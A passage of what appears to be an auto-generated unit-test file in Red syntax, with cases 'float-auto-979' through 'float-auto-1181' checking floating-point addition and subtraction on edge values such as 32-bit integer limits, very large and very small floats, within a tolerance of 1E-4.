fat-i: 2147483647.0 fat-j: 9.99999E-45 fat-k: fat-i + fat-j --assertf~= 2147483647.0 fat-k 1E-4 --test-- "float-auto-979" fat-i: 2147483647.0 fat-j: 7.7E+18 fat-k: fat-i + fat-j --assertf~= 7.70000000214748E+18 fat-k 1E-4 --test-- "float-auto-980" fat-i: -1.0 fat-j: 0.0 fat-k: fat-i + fat-j --assertf~= -1.0 fat-k 1E-4 --test-- "float-auto-981" fat-i: -1.0 fat-j: -2147483648.0 fat-k: fat-i + fat-j --assertf~= -2147483649.0 fat-k 1E-4 --test-- "float-auto-982" fat-i: -1.0 fat-j: 2147483647.0 fat-k: fat-i + fat-j --assertf~= 2147483646.0 fat-k 1E-4 --test-- "float-auto-983" fat-i: -1.0 fat-j: -1.0 fat-k: fat-i + fat-j --assertf~= -2.0 fat-k 1E-4 --test-- "float-auto-984" fat-i: -1.0 fat-j: 3.0 fat-k: fat-i + fat-j --assertf~= 2.0 fat-k 1E-4 --test-- "float-auto-985" fat-i: -1.0 fat-j: -7.0 fat-k: fat-i + fat-j --assertf~= -8.0 fat-k 1E-4 --test-- "float-auto-986" fat-i: -1.0 fat-j: 5.0 fat-k: fat-i + fat-j --assertf~= 4.0 fat-k 1E-4 --test-- "float-auto-987" fat-i: -1.0 fat-j: 123456.789 fat-k: fat-i + fat-j --assertf~= 123455.789 fat-k 1E-4 --test-- "float-auto-988" fat-i: -1.0 fat-j: 1.222090944E+33 fat-k: fat-i + fat-j --assertf~= 1.222090944E+33 fat-k 1E-4 --test-- "float-auto-989" fat-i: -1.0 fat-j: 9.99999E-45 fat-k: fat-i + fat-j --assertf~= -1.0 fat-k 1E-4 --test-- "float-auto-990" fat-i: -1.0 fat-j: 7.7E+18 fat-k: fat-i + fat-j --assertf~= 7.7E+18 fat-k 1E-4 --test-- "float-auto-991" fat-i: 3.0 fat-j: 0.0 fat-k: fat-i + fat-j --assertf~= 3.0 fat-k 1E-4 --test-- "float-auto-992" fat-i: 3.0 fat-j: -2147483648.0 fat-k: fat-i + fat-j --assertf~= -2147483645.0 fat-k 1E-4 --test-- "float-auto-993" fat-i: 3.0 fat-j: 2147483647.0 fat-k: fat-i + fat-j --assertf~= 2147483650.0 fat-k 1E-4 --test-- "float-auto-994" fat-i: 3.0 fat-j: -1.0 fat-k: fat-i + fat-j --assertf~= 2.0 fat-k 1E-4 --test-- "float-auto-995" fat-i: 3.0 fat-j: 3.0 fat-k: fat-i + fat-j --assertf~= 6.0 fat-k 1E-4 --test-- "float-auto-996" fat-i: 3.0 fat-j: -7.0 fat-k: fat-i + fat-j --assertf~= -4.0 fat-k 1E-4 --test-- "float-auto-997" fat-i: 3.0 fat-j: 5.0 fat-k: fat-i + fat-j --assertf~= 8.0 fat-k 1E-4 --test-- "float-auto-998" fat-i: 3.0 fat-j: 123456.789 fat-k: fat-i + fat-j --assertf~= 123459.789 fat-k 1E-4 --test-- "float-auto-999" fat-i: 3.0 fat-j: 1.222090944E+33 fat-k: fat-i + fat-j --assertf~= 1.222090944E+33 fat-k 1E-4 --test-- "float-auto-1000" fat-i: 3.0 fat-j: 9.99999E-45 fat-k: fat-i + fat-j --assertf~= 3.0 fat-k 1E-4 --test-- "float-auto-1001" fat-i: 3.0 fat-j: 7.7E+18 fat-k: fat-i + fat-j --assertf~= 7.7E+18 fat-k 1E-4 --test-- "float-auto-1002" fat-i: -7.0 fat-j: 0.0 fat-k: fat-i + fat-j --assertf~= -7.0 fat-k 1E-4 --test-- "float-auto-1003" fat-i: -7.0 fat-j: -2147483648.0 fat-k: fat-i + fat-j --assertf~= -2147483655.0 fat-k 1E-4 --test-- "float-auto-1004" fat-i: -7.0 fat-j: 2147483647.0 fat-k: fat-i + fat-j --assertf~= 2147483640.0 fat-k 1E-4 --test-- "float-auto-1005" fat-i: -7.0 fat-j: -1.0 fat-k: fat-i + fat-j --assertf~= -8.0 fat-k 1E-4 --test-- "float-auto-1006" fat-i: -7.0 fat-j: 3.0 fat-k: fat-i + fat-j --assertf~= -4.0 fat-k 1E-4 --test-- "float-auto-1007" fat-i: -7.0 fat-j: -7.0 fat-k: fat-i + fat-j --assertf~= -14.0 fat-k 1E-4 --test-- "float-auto-1008" fat-i: -7.0 fat-j: 5.0 fat-k: fat-i + fat-j --assertf~= -2.0 fat-k 1E-4 --test-- "float-auto-1009" fat-i: -7.0 fat-j: 123456.789 fat-k: fat-i + fat-j --assertf~= 123449.789 fat-k 1E-4 --test-- "float-auto-1010" fat-i: -7.0 fat-j: 1.222090944E+33 fat-k: fat-i + fat-j --assertf~= 1.222090944E+33 fat-k 1E-4 --test-- "float-auto-1011" fat-i: -7.0 fat-j: 9.99999E-45 fat-k: fat-i + fat-j --assertf~= -7.0 fat-k 1E-4 --test-- "float-auto-1012" fat-i: -7.0 fat-j: 7.7E+18 fat-k: fat-i + fat-j --assertf~= 7.7E+18 fat-k 1E-4 --test-- "float-auto-1013" fat-i: 5.0 fat-j: 0.0 fat-k: fat-i + fat-j --assertf~= 5.0 fat-k 1E-4 --test-- "float-auto-1014" fat-i: 5.0 fat-j: -2147483648.0 fat-k: fat-i + fat-j --assertf~= -2147483643.0 fat-k 1E-4 --test-- "float-auto-1015" fat-i: 5.0 fat-j: 2147483647.0 fat-k: fat-i + fat-j --assertf~= 2147483652.0 fat-k 1E-4 --test-- "float-auto-1016" fat-i: 5.0 fat-j: -1.0 fat-k: fat-i + fat-j --assertf~= 4.0 fat-k 1E-4 --test-- "float-auto-1017" fat-i: 5.0 fat-j: 3.0 fat-k: fat-i + fat-j --assertf~= 8.0 fat-k 1E-4 --test-- "float-auto-1018" fat-i: 5.0 fat-j: -7.0 fat-k: fat-i + fat-j --assertf~= -2.0 fat-k 1E-4 --test-- "float-auto-1019" fat-i: 5.0 fat-j: 5.0 fat-k: fat-i + fat-j --assertf~= 10.0 fat-k 1E-4 --test-- "float-auto-1020" fat-i: 5.0 fat-j: 123456.789 fat-k: fat-i + fat-j --assertf~= 123461.789 fat-k 1E-4 --test-- "float-auto-1021" fat-i: 5.0 fat-j: 1.222090944E+33 fat-k: fat-i + fat-j --assertf~= 1.222090944E+33 fat-k 1E-4 --test-- "float-auto-1022" fat-i: 5.0 fat-j: 9.99999E-45 fat-k: fat-i + fat-j --assertf~= 5.0 fat-k 1E-4 --test-- "float-auto-1023" fat-i: 5.0 fat-j: 7.7E+18 fat-k: fat-i + fat-j --assertf~= 7.7E+18 fat-k 1E-4 --test-- "float-auto-1024" fat-i: 123456.789 fat-j: 0.0 fat-k: fat-i + fat-j --assertf~= 123456.789 fat-k 1E-4 --test-- "float-auto-1025" fat-i: 123456.789 fat-j: -2147483648.0 fat-k: fat-i + fat-j --assertf~= -2147360191.211 fat-k 1E-4 --test-- "float-auto-1026" fat-i: 123456.789 fat-j: 2147483647.0 fat-k: fat-i + fat-j --assertf~= 2147607103.789 fat-k 1E-4 --test-- "float-auto-1027" fat-i: 123456.789 fat-j: -1.0 fat-k: fat-i + fat-j --assertf~= 123455.789 fat-k 1E-4 --test-- "float-auto-1028" fat-i: 123456.789 fat-j: 3.0 fat-k: fat-i + fat-j --assertf~= 123459.789 fat-k 1E-4 --test-- "float-auto-1029" fat-i: 123456.789 fat-j: -7.0 fat-k: fat-i + fat-j --assertf~= 123449.789 fat-k 1E-4 --test-- "float-auto-1030" fat-i: 123456.789 fat-j: 5.0 fat-k: fat-i + fat-j --assertf~= 123461.789 fat-k 1E-4 --test-- "float-auto-1031" fat-i: 123456.789 fat-j: 123456.789 fat-k: fat-i + fat-j --assertf~= 246913.578 fat-k 1E-4 --test-- "float-auto-1032" fat-i: 123456.789 fat-j: 1.222090944E+33 fat-k: fat-i + fat-j --assertf~= 1.222090944E+33 fat-k 1E-4 --test-- "float-auto-1033" fat-i: 123456.789 fat-j: 9.99999E-45 fat-k: fat-i + fat-j --assertf~= 123456.789 fat-k 1E-4 --test-- "float-auto-1034" fat-i: 123456.789 fat-j: 7.7E+18 fat-k: fat-i + fat-j --assertf~= 7.70000000000012E+18 fat-k 1E-4 --test-- "float-auto-1035" fat-i: 1.222090944E+33 fat-j: 0.0 fat-k: fat-i + fat-j --assertf~= 1.222090944E+33 fat-k 1E-4 --test-- "float-auto-1036" fat-i: 1.222090944E+33 fat-j: -2147483648.0 fat-k: fat-i + fat-j --assertf~= 1.222090944E+33 fat-k 1E-4 --test-- "float-auto-1037" fat-i: 1.222090944E+33 fat-j: 2147483647.0 fat-k: fat-i + fat-j --assertf~= 1.222090944E+33 fat-k 1E-4 --test-- "float-auto-1038" fat-i: 1.222090944E+33 fat-j: -1.0 fat-k: fat-i + fat-j --assertf~= 1.222090944E+33 fat-k 1E-4 --test-- "float-auto-1039" fat-i: 1.222090944E+33 fat-j: 3.0 fat-k: fat-i + fat-j --assertf~= 1.222090944E+33 fat-k 1E-4 --test-- "float-auto-1040" fat-i: 1.222090944E+33 fat-j: -7.0 fat-k: fat-i + fat-j --assertf~= 1.222090944E+33 fat-k 1E-4 --test-- "float-auto-1041" fat-i: 1.222090944E+33 fat-j: 5.0 fat-k: fat-i + fat-j --assertf~= 1.222090944E+33 fat-k 1E-4 --test-- "float-auto-1042" fat-i: 1.222090944E+33 fat-j: 123456.789 fat-k: fat-i + fat-j --assertf~= 1.222090944E+33 fat-k 1E-4 --test-- "float-auto-1043" fat-i: 1.222090944E+33 fat-j: 1.222090944E+33 fat-k: fat-i + fat-j --assertf~= 2.444181888E+33 fat-k 1E-4 --test-- "float-auto-1044" fat-i: 1.222090944E+33 fat-j: 9.99999E-45 fat-k: fat-i + fat-j --assertf~= 1.222090944E+33 fat-k 1E-4 --test-- "float-auto-1045" fat-i: 1.222090944E+33 fat-j: 7.7E+18 fat-k: fat-i + fat-j --assertf~= 1.22209094400001E+33 fat-k 1E-4 --test-- "float-auto-1046" fat-i: 9.99999E-45 fat-j: 0.0 fat-k: fat-i + fat-j --assertf~= 9.99999E-45 fat-k 1E-4 --test-- "float-auto-1047" fat-i: 9.99999E-45 fat-j: -2147483648.0 fat-k: fat-i + fat-j --assertf~= -2147483648.0 fat-k 1E-4 --test-- "float-auto-1048" fat-i: 9.99999E-45 fat-j: 2147483647.0 fat-k: fat-i + fat-j --assertf~= 2147483647.0 fat-k 1E-4 --test-- "float-auto-1049" fat-i: 9.99999E-45 fat-j: -1.0 fat-k: fat-i + fat-j --assertf~= -1.0 fat-k 1E-4 --test-- "float-auto-1050" fat-i: 9.99999E-45 fat-j: 3.0 fat-k: fat-i + fat-j --assertf~= 3.0 fat-k 1E-4 --test-- "float-auto-1051" fat-i: 9.99999E-45 fat-j: -7.0 fat-k: fat-i + fat-j --assertf~= -7.0 fat-k 1E-4 --test-- "float-auto-1052" fat-i: 9.99999E-45 fat-j: 5.0 fat-k: fat-i + fat-j --assertf~= 5.0 fat-k 1E-4 --test-- "float-auto-1053" fat-i: 9.99999E-45 fat-j: 123456.789 fat-k: fat-i + fat-j --assertf~= 123456.789 fat-k 1E-4 --test-- "float-auto-1054" fat-i: 9.99999E-45 fat-j: 1.222090944E+33 fat-k: fat-i + fat-j --assertf~= 1.222090944E+33 fat-k 1E-4 --test-- "float-auto-1055" fat-i: 9.99999E-45 fat-j: 9.99999E-45 fat-k: fat-i + fat-j --assertf~= 1.999998E-44 fat-k 1E-4 --test-- "float-auto-1056" fat-i: 9.99999E-45 fat-j: 7.7E+18 fat-k: fat-i + fat-j --assertf~= 7.7E+18 fat-k 1E-4 --test-- "float-auto-1057" fat-i: 7.7E+18 fat-j: 0.0 fat-k: fat-i + fat-j --assertf~= 7.7E+18 fat-k 1E-4 --test-- "float-auto-1058" fat-i: 7.7E+18 fat-j: -2147483648.0 fat-k: fat-i + fat-j --assertf~= 7.69999999785252E+18 fat-k 1E-4 --test-- "float-auto-1059" fat-i: 7.7E+18 fat-j: 2147483647.0 fat-k: fat-i + fat-j --assertf~= 7.70000000214748E+18 fat-k 1E-4 --test-- "float-auto-1060" fat-i: 7.7E+18 fat-j: -1.0 fat-k: fat-i + fat-j --assertf~= 7.7E+18 fat-k 1E-4 --test-- "float-auto-1061" fat-i: 7.7E+18 fat-j: 3.0 fat-k: fat-i + fat-j --assertf~= 7.7E+18 fat-k 1E-4 --test-- "float-auto-1062" fat-i: 7.7E+18 fat-j: -7.0 fat-k: fat-i + fat-j --assertf~= 7.7E+18 fat-k 1E-4 --test-- "float-auto-1063" fat-i: 7.7E+18 fat-j: 5.0 fat-k: fat-i + fat-j --assertf~= 7.7E+18 fat-k 1E-4 --test-- "float-auto-1064" fat-i: 7.7E+18 fat-j: 123456.789 fat-k: fat-i + fat-j --assertf~= 7.70000000000012E+18 fat-k 1E-4 --test-- "float-auto-1065" fat-i: 7.7E+18 fat-j: 1.222090944E+33 fat-k: fat-i + fat-j --assertf~= 1.22209094400001E+33 fat-k 1E-4 --test-- "float-auto-1066" fat-i: 7.7E+18 fat-j: 9.99999E-45 fat-k: fat-i + fat-j --assertf~= 7.7E+18 fat-k 1E-4 --test-- "float-auto-1067" fat-i: 7.7E+18 fat-j: 7.7E+18 fat-k: fat-i + fat-j --assertf~= 1.54E+19 fat-k 1E-4 --test-- "float-auto-1068" fat-i: 0.0 fat-j: 0.0 fat-k: fat-i - fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-1069" fat-i: 0.0 fat-j: -2147483648.0 fat-k: fat-i - fat-j --assertf~= 2147483648.0 fat-k 1E-4 --test-- "float-auto-1070" fat-i: 0.0 fat-j: 2147483647.0 fat-k: fat-i - fat-j --assertf~= -2147483647.0 fat-k 1E-4 --test-- "float-auto-1071" fat-i: 0.0 fat-j: -1.0 fat-k: fat-i - fat-j --assertf~= 1.0 fat-k 1E-4 --test-- "float-auto-1072" fat-i: 0.0 fat-j: 3.0 fat-k: fat-i - fat-j --assertf~= -3.0 fat-k 1E-4 --test-- "float-auto-1073" fat-i: 0.0 fat-j: -7.0 fat-k: fat-i - fat-j --assertf~= 7.0 fat-k 1E-4 --test-- "float-auto-1074" fat-i: 0.0 fat-j: 5.0 fat-k: fat-i - fat-j --assertf~= -5.0 fat-k 1E-4 --test-- "float-auto-1075" fat-i: 0.0 fat-j: 123456.789 fat-k: fat-i - fat-j --assertf~= -123456.789 fat-k 1E-4 --test-- "float-auto-1076" fat-i: 0.0 fat-j: 1.222090944E+33 fat-k: fat-i - fat-j --assertf~= -1.222090944E+33 fat-k 1E-4 --test-- "float-auto-1077" fat-i: 0.0 fat-j: 9.99999E-45 fat-k: fat-i - fat-j --assertf~= -9.99999E-45 fat-k 1E-4 --test-- "float-auto-1078" fat-i: 0.0 fat-j: 7.7E+18 fat-k: fat-i - fat-j --assertf~= -7.7E+18 fat-k 1E-4 --test-- "float-auto-1079" fat-i: -2147483648.0 fat-j: 0.0 fat-k: fat-i - fat-j --assertf~= -2147483648.0 fat-k 1E-4 --test-- "float-auto-1080" fat-i: -2147483648.0 fat-j: -2147483648.0 fat-k: fat-i - fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-1081" fat-i: -2147483648.0 fat-j: 2147483647.0 fat-k: fat-i - fat-j --assertf~= -4294967295.0 fat-k 1E-4 --test-- "float-auto-1082" fat-i: -2147483648.0 fat-j: -1.0 fat-k: fat-i - fat-j --assertf~= -2147483647.0 fat-k 1E-4 --test-- "float-auto-1083" fat-i: -2147483648.0 fat-j: 3.0 fat-k: fat-i - fat-j --assertf~= -2147483651.0 fat-k 1E-4 --test-- "float-auto-1084" fat-i: -2147483648.0 fat-j: -7.0 fat-k: fat-i - fat-j --assertf~= -2147483641.0 fat-k 1E-4 --test-- "float-auto-1085" fat-i: -2147483648.0 fat-j: 5.0 fat-k: fat-i - fat-j --assertf~= -2147483653.0 fat-k 1E-4 --test-- "float-auto-1086" fat-i: -2147483648.0 fat-j: 123456.789 fat-k: fat-i - fat-j --assertf~= -2147607104.789 fat-k 1E-4 --test-- "float-auto-1087" fat-i: -2147483648.0 fat-j: 1.222090944E+33 fat-k: fat-i - fat-j --assertf~= -1.222090944E+33 fat-k 1E-4 --test-- "float-auto-1088" fat-i: -2147483648.0 fat-j: 9.99999E-45 fat-k: fat-i - fat-j --assertf~= -2147483648.0 fat-k 1E-4 --test-- "float-auto-1089" fat-i: -2147483648.0 fat-j: 7.7E+18 fat-k: fat-i - fat-j --assertf~= -7.70000000214748E+18 fat-k 1E-4 --test-- "float-auto-1090" fat-i: 2147483647.0 fat-j: 0.0 fat-k: fat-i - fat-j --assertf~= 2147483647.0 fat-k 1E-4 --test-- "float-auto-1091" fat-i: 2147483647.0 fat-j: -2147483648.0 fat-k: fat-i - fat-j --assertf~= 4294967295.0 fat-k 1E-4 --test-- "float-auto-1092" fat-i: 2147483647.0 fat-j: 2147483647.0 fat-k: fat-i - fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-1093" fat-i: 2147483647.0 fat-j: -1.0 fat-k: fat-i - fat-j --assertf~= 2147483648.0 fat-k 1E-4 --test-- "float-auto-1094" fat-i: 2147483647.0 fat-j: 3.0 fat-k: fat-i - fat-j --assertf~= 2147483644.0 fat-k 1E-4 --test-- "float-auto-1095" fat-i: 2147483647.0 fat-j: -7.0 fat-k: fat-i - fat-j --assertf~= 2147483654.0 fat-k 1E-4 --test-- "float-auto-1096" fat-i: 2147483647.0 fat-j: 5.0 fat-k: fat-i - fat-j --assertf~= 2147483642.0 fat-k 1E-4 --test-- "float-auto-1097" fat-i: 2147483647.0 fat-j: 123456.789 fat-k: fat-i - fat-j --assertf~= 2147360190.211 fat-k 1E-4 --test-- "float-auto-1098" fat-i: 2147483647.0 fat-j: 1.222090944E+33 fat-k: fat-i - fat-j --assertf~= -1.222090944E+33 fat-k 1E-4 --test-- "float-auto-1099" fat-i: 2147483647.0 fat-j: 9.99999E-45 fat-k: fat-i - fat-j --assertf~= 2147483647.0 fat-k 1E-4 --test-- "float-auto-1100" fat-i: 2147483647.0 fat-j: 7.7E+18 fat-k: fat-i - fat-j --assertf~= -7.69999999785252E+18 fat-k 1E-4 --test-- "float-auto-1101" fat-i: -1.0 fat-j: 0.0 fat-k: fat-i - fat-j --assertf~= -1.0 fat-k 1E-4 --test-- "float-auto-1102" fat-i: -1.0 fat-j: -2147483648.0 fat-k: fat-i - fat-j --assertf~= 2147483647.0 fat-k 1E-4 --test-- "float-auto-1103" fat-i: -1.0 fat-j: 2147483647.0 fat-k: fat-i - fat-j --assertf~= -2147483648.0 fat-k 1E-4 --test-- "float-auto-1104" fat-i: -1.0 fat-j: -1.0 fat-k: fat-i - fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-1105" fat-i: -1.0 fat-j: 3.0 fat-k: fat-i - fat-j --assertf~= -4.0 fat-k 1E-4 --test-- "float-auto-1106" fat-i: -1.0 fat-j: -7.0 fat-k: fat-i - fat-j --assertf~= 6.0 fat-k 1E-4 --test-- "float-auto-1107" fat-i: -1.0 fat-j: 5.0 fat-k: fat-i - fat-j --assertf~= -6.0 fat-k 1E-4 --test-- "float-auto-1108" fat-i: -1.0 fat-j: 123456.789 fat-k: fat-i - fat-j --assertf~= -123457.789 fat-k 1E-4 --test-- "float-auto-1109" fat-i: -1.0 fat-j: 1.222090944E+33 fat-k: fat-i - fat-j --assertf~= -1.222090944E+33 fat-k 1E-4 --test-- "float-auto-1110" fat-i: -1.0 fat-j: 9.99999E-45 fat-k: fat-i - fat-j --assertf~= -1.0 fat-k 1E-4 --test-- "float-auto-1111" fat-i: -1.0 fat-j: 7.7E+18 fat-k: fat-i - fat-j --assertf~= -7.7E+18 fat-k 1E-4 --test-- "float-auto-1112" fat-i: 3.0 fat-j: 0.0 fat-k: fat-i - fat-j --assertf~= 3.0 fat-k 1E-4 --test-- "float-auto-1113" fat-i: 3.0 fat-j: -2147483648.0 fat-k: fat-i - fat-j --assertf~= 2147483651.0 fat-k 1E-4 --test-- "float-auto-1114" fat-i: 3.0 fat-j: 2147483647.0 fat-k: fat-i - fat-j --assertf~= -2147483644.0 fat-k 1E-4 --test-- "float-auto-1115" fat-i: 3.0 fat-j: -1.0 fat-k: fat-i - fat-j --assertf~= 4.0 fat-k 1E-4 --test-- "float-auto-1116" fat-i: 3.0 fat-j: 3.0 fat-k: fat-i - fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-1117" fat-i: 3.0 fat-j: -7.0 fat-k: fat-i - fat-j --assertf~= 10.0 fat-k 1E-4 --test-- "float-auto-1118" fat-i: 3.0 fat-j: 5.0 fat-k: fat-i - fat-j --assertf~= -2.0 fat-k 1E-4 --test-- "float-auto-1119" fat-i: 3.0 fat-j: 123456.789 fat-k: fat-i - fat-j --assertf~= -123453.789 fat-k 1E-4 --test-- "float-auto-1120" fat-i: 3.0 fat-j: 1.222090944E+33 fat-k: fat-i - fat-j --assertf~= -1.222090944E+33 fat-k 1E-4 --test-- "float-auto-1121" fat-i: 3.0 fat-j: 9.99999E-45 fat-k: fat-i - fat-j --assertf~= 3.0 fat-k 1E-4 --test-- "float-auto-1122" fat-i: 3.0 fat-j: 7.7E+18 fat-k: fat-i - fat-j --assertf~= -7.7E+18 fat-k 1E-4 --test-- "float-auto-1123" fat-i: -7.0 fat-j: 0.0 fat-k: fat-i - fat-j --assertf~= -7.0 fat-k 1E-4 --test-- "float-auto-1124" fat-i: -7.0 fat-j: -2147483648.0 fat-k: fat-i - fat-j --assertf~= 2147483641.0 fat-k 1E-4 --test-- "float-auto-1125" fat-i: -7.0 fat-j: 2147483647.0 fat-k: fat-i - fat-j --assertf~= -2147483654.0 fat-k 1E-4 --test-- "float-auto-1126" fat-i: -7.0 fat-j: -1.0 fat-k: fat-i - fat-j --assertf~= -6.0 fat-k 1E-4 --test-- "float-auto-1127" fat-i: -7.0 fat-j: 3.0 fat-k: fat-i - fat-j --assertf~= -10.0 fat-k 1E-4 --test-- "float-auto-1128" fat-i: -7.0 fat-j: -7.0 fat-k: fat-i - fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-1129" fat-i: -7.0 fat-j: 5.0 fat-k: fat-i - fat-j --assertf~= -12.0 fat-k 1E-4 --test-- "float-auto-1130" fat-i: -7.0 fat-j: 123456.789 fat-k: fat-i - fat-j --assertf~= -123463.789 fat-k 1E-4 --test-- "float-auto-1131" fat-i: -7.0 fat-j: 1.222090944E+33 fat-k: fat-i - fat-j --assertf~= -1.222090944E+33 fat-k 1E-4 --test-- "float-auto-1132" fat-i: -7.0 fat-j: 9.99999E-45 fat-k: fat-i - fat-j --assertf~= -7.0 fat-k 1E-4 --test-- "float-auto-1133" fat-i: -7.0 fat-j: 7.7E+18 fat-k: fat-i - fat-j --assertf~= -7.7E+18 fat-k 1E-4 --test-- "float-auto-1134" fat-i: 5.0 fat-j: 0.0 fat-k: fat-i - fat-j --assertf~= 5.0 fat-k 1E-4 --test-- "float-auto-1135" fat-i: 5.0 fat-j: -2147483648.0 fat-k: fat-i - fat-j --assertf~= 2147483653.0 fat-k 1E-4 --test-- "float-auto-1136" fat-i: 5.0 fat-j: 2147483647.0 fat-k: fat-i - fat-j --assertf~= -2147483642.0 fat-k 1E-4 --test-- "float-auto-1137" fat-i: 5.0 fat-j: -1.0 fat-k: fat-i - fat-j --assertf~= 6.0 fat-k 1E-4 --test-- "float-auto-1138" fat-i: 5.0 fat-j: 3.0 fat-k: fat-i - fat-j --assertf~= 2.0 fat-k 1E-4 --test-- "float-auto-1139" fat-i: 5.0 fat-j: -7.0 fat-k: fat-i - fat-j --assertf~= 12.0 fat-k 1E-4 --test-- "float-auto-1140" fat-i: 5.0 fat-j: 5.0 fat-k: fat-i - fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-1141" fat-i: 5.0 fat-j: 123456.789 fat-k: fat-i - fat-j --assertf~= -123451.789 fat-k 1E-4 --test-- "float-auto-1142" fat-i: 5.0 fat-j: 1.222090944E+33 fat-k: fat-i - fat-j --assertf~= -1.222090944E+33 fat-k 1E-4 --test-- "float-auto-1143" fat-i: 5.0 fat-j: 9.99999E-45 fat-k: fat-i - fat-j --assertf~= 5.0 fat-k 1E-4 --test-- "float-auto-1144" fat-i: 5.0 fat-j: 7.7E+18 fat-k: fat-i - fat-j --assertf~= -7.7E+18 fat-k 1E-4 --test-- "float-auto-1145" fat-i: 123456.789 fat-j: 0.0 fat-k: fat-i - fat-j --assertf~= 123456.789 fat-k 1E-4 --test-- "float-auto-1146" fat-i: 123456.789 fat-j: -2147483648.0 fat-k: fat-i - fat-j --assertf~= 2147607104.789 fat-k 1E-4 --test-- "float-auto-1147" fat-i: 123456.789 fat-j: 2147483647.0 fat-k: fat-i - fat-j --assertf~= -2147360190.211 fat-k 1E-4 --test-- "float-auto-1148" fat-i: 123456.789 fat-j: -1.0 fat-k: fat-i - fat-j --assertf~= 123457.789 fat-k 1E-4 --test-- "float-auto-1149" fat-i: 123456.789 fat-j: 3.0 fat-k: fat-i - fat-j --assertf~= 123453.789 fat-k 1E-4 --test-- "float-auto-1150" fat-i: 123456.789 fat-j: -7.0 fat-k: fat-i - fat-j --assertf~= 123463.789 fat-k 1E-4 --test-- "float-auto-1151" fat-i: 123456.789 fat-j: 5.0 fat-k: fat-i - fat-j --assertf~= 123451.789 fat-k 1E-4 --test-- "float-auto-1152" fat-i: 123456.789 fat-j: 123456.789 fat-k: fat-i - fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-1153" fat-i: 123456.789 fat-j: 1.222090944E+33 fat-k: fat-i - fat-j --assertf~= -1.222090944E+33 fat-k 1E-4 --test-- "float-auto-1154" fat-i: 123456.789 fat-j: 9.99999E-45 fat-k: fat-i - fat-j --assertf~= 123456.789 fat-k 1E-4 --test-- "float-auto-1155" fat-i: 123456.789 fat-j: 7.7E+18 fat-k: fat-i - fat-j --assertf~= -7.69999999999988E+18 fat-k 1E-4 --test-- "float-auto-1156" fat-i: 1.222090944E+33 fat-j: 0.0 fat-k: fat-i - fat-j --assertf~= 1.222090944E+33 fat-k 1E-4 --test-- "float-auto-1157" fat-i: 1.222090944E+33 fat-j: -2147483648.0 fat-k: fat-i - fat-j --assertf~= 1.222090944E+33 fat-k 1E-4 --test-- "float-auto-1158" fat-i: 1.222090944E+33 fat-j: 2147483647.0 fat-k: fat-i - fat-j --assertf~= 1.222090944E+33 fat-k 1E-4 --test-- "float-auto-1159" fat-i: 1.222090944E+33 fat-j: -1.0 fat-k: fat-i - fat-j --assertf~= 1.222090944E+33 fat-k 1E-4 --test-- "float-auto-1160" fat-i: 1.222090944E+33 fat-j: 3.0 fat-k: fat-i - fat-j --assertf~= 1.222090944E+33 fat-k 1E-4 --test-- "float-auto-1161" fat-i: 1.222090944E+33 fat-j: -7.0 fat-k: fat-i - fat-j --assertf~= 1.222090944E+33 fat-k 1E-4 --test-- "float-auto-1162" fat-i: 1.222090944E+33 fat-j: 5.0 fat-k: fat-i - fat-j --assertf~= 1.222090944E+33 fat-k 1E-4 --test-- "float-auto-1163" fat-i: 1.222090944E+33 fat-j: 123456.789 fat-k: fat-i - fat-j --assertf~= 1.222090944E+33 fat-k 1E-4 --test-- "float-auto-1164" fat-i: 1.222090944E+33 fat-j: 1.222090944E+33 fat-k: fat-i - fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-1165" fat-i: 1.222090944E+33 fat-j: 9.99999E-45 fat-k: fat-i - fat-j --assertf~= 1.222090944E+33 fat-k 1E-4 --test-- "float-auto-1166" fat-i: 1.222090944E+33 fat-j: 7.7E+18 fat-k: fat-i - fat-j --assertf~= 1.22209094399999E+33 fat-k 1E-4 --test-- "float-auto-1167" fat-i: 9.99999E-45 fat-j: 0.0 fat-k: fat-i - fat-j --assertf~= 9.99999E-45 fat-k 1E-4 --test-- "float-auto-1168" fat-i: 9.99999E-45 fat-j: -2147483648.0 fat-k: fat-i - fat-j --assertf~= 2147483648.0 fat-k 1E-4 --test-- "float-auto-1169" fat-i: 9.99999E-45 fat-j: 2147483647.0 fat-k: fat-i - fat-j --assertf~= -2147483647.0 fat-k 1E-4 --test-- "float-auto-1170" fat-i: 9.99999E-45 fat-j: -1.0 fat-k: fat-i - fat-j --assertf~= 1.0 fat-k 1E-4 --test-- "float-auto-1171" fat-i: 9.99999E-45 fat-j: 3.0 fat-k: fat-i - fat-j --assertf~= -3.0 fat-k 1E-4 --test-- "float-auto-1172" fat-i: 9.99999E-45 fat-j: -7.0 fat-k: fat-i - fat-j --assertf~= 7.0 fat-k 1E-4 --test-- "float-auto-1173" fat-i: 9.99999E-45 fat-j: 5.0 fat-k: fat-i - fat-j --assertf~= -5.0 fat-k 1E-4 --test-- "float-auto-1174" fat-i: 9.99999E-45 fat-j: 123456.789 fat-k: fat-i - fat-j --assertf~= -123456.789 fat-k 1E-4 --test-- "float-auto-1175" fat-i: 9.99999E-45 fat-j: 1.222090944E+33 fat-k: fat-i - fat-j --assertf~= -1.222090944E+33 fat-k 1E-4 --test-- "float-auto-1176" fat-i: 9.99999E-45 fat-j: 9.99999E-45 fat-k: fat-i - fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-1177" fat-i: 9.99999E-45 fat-j: 7.7E+18 fat-k: fat-i - fat-j --assertf~= -7.7E+18 fat-k 1E-4 --test-- "float-auto-1178" fat-i: 7.7E+18 fat-j: 0.0 fat-k: fat-i - fat-j --assertf~= 7.7E+18 fat-k 1E-4 --test-- "float-auto-1179" fat-i: 7.7E+18 fat-j: -2147483648.0 fat-k: fat-i - fat-j --assertf~= 7.70000000214748E+18 fat-k 1E-4 --test-- "float-auto-1180" fat-i: 7.7E+18 fat-j: 2147483647.0 fat-k: fat-i - fat-j --assertf~= 7.69999999785252E+18 fat-k 1E-4 --test-- "float-auto-1181" fat-i: 7.7E+18 fat-j: -1.0 fat-k: fat-i - fat-j 